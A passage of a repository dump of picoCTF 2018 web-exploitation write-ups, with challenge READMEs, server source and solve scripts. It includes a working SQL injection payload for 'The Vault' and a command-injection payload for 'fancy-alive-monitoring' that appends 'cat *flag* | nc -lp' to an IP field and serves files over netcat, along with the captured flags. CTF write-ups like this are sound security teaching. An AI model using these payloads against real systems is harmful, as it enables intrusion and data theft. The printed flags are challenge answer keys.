\n \n\n\n" }, { "path": "Web Exploitation/Secure Logon/README.md", "content": "# Secure Logon\nPoints: 500\n\n## Category\nWeb Exploitation\n\n## Question\n>Uh oh, the login page is more secure... I think. http://2018shell1.picoctf.com:12004 ([link](http://2018shell1.picoctf.com:12004/)). [Source](files/server_noflag.py). \n\n### Hint\n>There are versions of AES that really aren't secure.\n\n## Solution\nUnsolved\n\n### Flag\n`flag`\n" }, { "path": "Web Exploitation/Secure Logon/files/server_noflag.py", "content": "from flask import Flask, render_template, request, url_for, redirect, make_response, flash\nimport json\nfrom hashlib import md5\nfrom base64 import b64decode\nfrom base64 import b64encode\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\n\napp = Flask(__name__)\napp.secret_key = 'seed removed'\nflag_value = 'flag removed'\n\nBLOCK_SIZE = 16 # Bytes\npad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * \\\n chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)\nunpad = lambda s: s[:-ord(s[len(s) - 1:])]\n\n\n@app.route(\"/\")\ndef main():\n return render_template('index.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.form['user'] == 'admin':\n message = \"I'm sorry the admin password is super secure. You're not getting in that way.\"\n category = 'danger'\n flash(message, category)\n return render_template('index.html')\n resp = make_response(redirect(\"/flag\"))\n\n cookie = {}\n cookie['password'] = request.form['password']\n cookie['username'] = request.form['user']\n cookie['admin'] = 0\n print(cookie)\n cookie_data = json.dumps(cookie, sort_keys=True)\n encrypted = AESCipher(app.secret_key).encrypt(cookie_data)\n print(encrypted)\n resp.set_cookie('cookie', encrypted)\n return resp\n\n@app.route('/logout')\ndef logout():\n resp = make_response(redirect(\"/\"))\n resp.set_cookie('cookie', '', expires=0)\n return resp\n\n@app.route('/flag', methods=['GET'])\ndef flag():\n try:\n encrypted = request.cookies['cookie']\n except KeyError:\n flash(\"Error: Please log-in again.\")\n return redirect(url_for('main'))\n data = AESCipher(app.secret_key).decrypt(encrypted)\n data = json.loads(data)\n\n try:\n check = data['admin']\n except KeyError:\n check = 0\n if check == 1:\n return render_template('flag.html', value=flag_value)\n flash(\"Success: You logged in! Not sure you'll be able to see the flag though.\", \"success\")\n return render_template('not-flag.html', cookie=data)\n\nclass AESCipher:\n \"\"\"\n Usage:\n c = AESCipher('password').encrypt('message')\n m = AESCipher('password').decrypt(c)\n Tested under Python 3 and PyCrypto 2.6.1.\n \"\"\"\n\n def __init__(self, key):\n self.key = md5(key.encode('utf8')).hexdigest()\n\n def encrypt(self, raw):\n raw = pad(raw)\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return b64encode(iv + cipher.encrypt(raw))\n\n def decrypt(self, enc):\n enc = b64decode(enc)\n iv = enc[:16]\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return unpad(cipher.decrypt(enc[16:])).decode('utf8')\n\nif __name__ == \"__main__\":\n app.run()\n" }, { "path": "Web Exploitation/The Vault/README.md", "content": "# The Vault\nPoints: 250\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:56537 ([link](http://2018shell1.picoctf.com:56537/)). Try to see if you can login! \n\n### Hint\nNo Hints.\n\n## Solution\nAn SQLi challenge where the php code running the query filters out the term _OR_.\n\nUsing _LIKE_, we can circumvent the filter.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{w3lc0m3_t0_th3_vau1t_c09f30a0}`\n" }, { "path": "Web Exploitation/The Vault/solution/solve.py", "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nparams = {\n\t'username': \"' LIKE '%'; --\",\n\t'password' : '',\n\t'debug': '0'\n}\n\nr = requests.post('http://2018shell1.picoctf.com:56537/login.php', data=params)\nprint re.findall(r'(picoCTF\\{.+\\})', r.text)[0]\n" }, { "path": "Web Exploitation/The Vault/solution/source/index.html", "content": "\n\n\n Login\n \n\n\n
\n
\n
\n
\n
\n

Log In

\n
\n
\n
\n
\n
\n \n \n
\n
\n \n
\n \n
\n
\n\n \n\n
\n \n
\n
\n
\n
\n
\n login.php source code\n
\n
\n
\n\n\n" }, { "path": "Web Exploitation/The Vault/solution/source/login.txt", "content": "\";\n echo \"username: \", htmlspecialchars($username), \"\\n\";\n echo \"password: \", htmlspecialchars($password), \"\\n\";\n echo \"SQL query: \", htmlspecialchars($query), \"\\n\";\n echo \"\";\n }\n\n //validation check\n $pattern =\"/.*['\\\"].*OR.*/i\";\n $user_match = preg_match($pattern, $username);\n $password_match = preg_match($pattern, $username);\n if($user_match + $password_match > 0) {\n echo \"

SQLi detected.

\";\n }\n else {\n $result = $con->query($query);\n $row = $result->fetchArray();\n \n if ($row) {\n echo \"

Logged in!

\";\n echo \"

Your flag is: $FLAG

\";\n } else {\n echo \"

Login failed.

\";\n }\n }\n \n?>\n" }, { "path": "Web Exploitation/fancy-alive-monitoring/README.md", "content": "# fancy-alive-monitoring\nPoints: 400\n\n## Category\nWeb Exploitation\n\n## Question\n>One of my school mate developed an alive monitoring tool. Can you get a flag from http://2018shell1.picoctf.com:31070 ([link](http://2018shell1.picoctf.com:31070/))? \n\n### Hint\n>This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate.\n>\n>You should be able to listen through the shell on the server.\n\n## Solution\nLooking at the php source code, we can see that the regex on the server side is missing a _$_ at the back. This means that we can append any shell command after the IP Address.\n\nThere's also client side Javascript, but we can circumvent it using Python.\n\nAll we have to do is to append a listener using netcat and get the flag. In this case, I set the port to 54433. Pipe the command `cat *flag*` to receive the flag.\n\nExploit: `8.8.8.8; cat *flag* | nc -lp 54433`. _8.8.8.8_ is used because that's the IP of Google's DNS. I used it just to speed up the process.\n\nFinally, we connect to the server using netcat and get the flag. `nc 2018shell1.picoctf.com 54433`.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{n3v3r_trust_a_b0x_91345b04}`\n" }, { "path": "Web Exploitation/fancy-alive-monitoring/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\nimport requests\nimport threading\nfrom time import sleep\nimport re\n\nPORT = 54433\n\ndef exploit(whut, exploit):\n\tlog.info('Sending exploit...')\n\tparams = {\n\t\t'ip': exploit\n\t}\n\n\tr = requests.post('http://2018shell1.picoctf.com:31070/index.php', data=params)\n\t\n\nthreading.Thread(target=exploit, args=(None, '8.8.8.8; cat *flag* | nc -lp {}'.format(PORT))).start()\nlog.success('Exploit sent!')\n\nlog.info('Connecting to shell in 3 seconds...')\nsleep(3)\nr = remote('2018shell1.picoctf.com', PORT)\nflag = r.recv()\nr.close()\n\nlog.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n" }, { "path": "Web Exploitation/fancy-alive-monitoring/solution/source/index.php", "content": "\n\n\tMonitoring Tool\n\t\n\n\n\t

Monitoring Tool ver 0.1

\n\t
\n\t

Input IP address of the target host\n\t\n\t

\n\t\n\t
\n\t
\n\n
\nindex.php source code\n\n\n" }, { "path": "Web Exploitation/fancy-alive-monitoring/solution/source/index.txt", "content": "\n\n\tMonitoring Tool\n\t\n\n\n\t

Monitoring Tool ver 0.1

\n\t
\n\t

Input IP address of the target host\n\t\n\t

\n\t\n\t
\n\t
\n\nTarget is NOT alive.\");\n\t\t\t\tbreak;\n\t\t\t} else if (strpos($str, ', 0% packet loss') !== false){\n\t\t\t\tprintf(\"

Target is alive.

\");\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t} else {\n\t\techo \"Wrong IP Format.\";\n\t}\n}\n?>\n
\nindex.php source code\n\n\n" }, { "path": "_config.yml", "content": "theme: jekyll-theme-hacker" }, { "path": "template/README.md", "content": "# Question\nPoints: pts\n\n## Category\nCategory\n\n## Question\n>Question goes here\n\n### Hint\n>Hint goes here\n\n## Solution\nSolution here\n\n### Flag\n`Flag`\n" } ]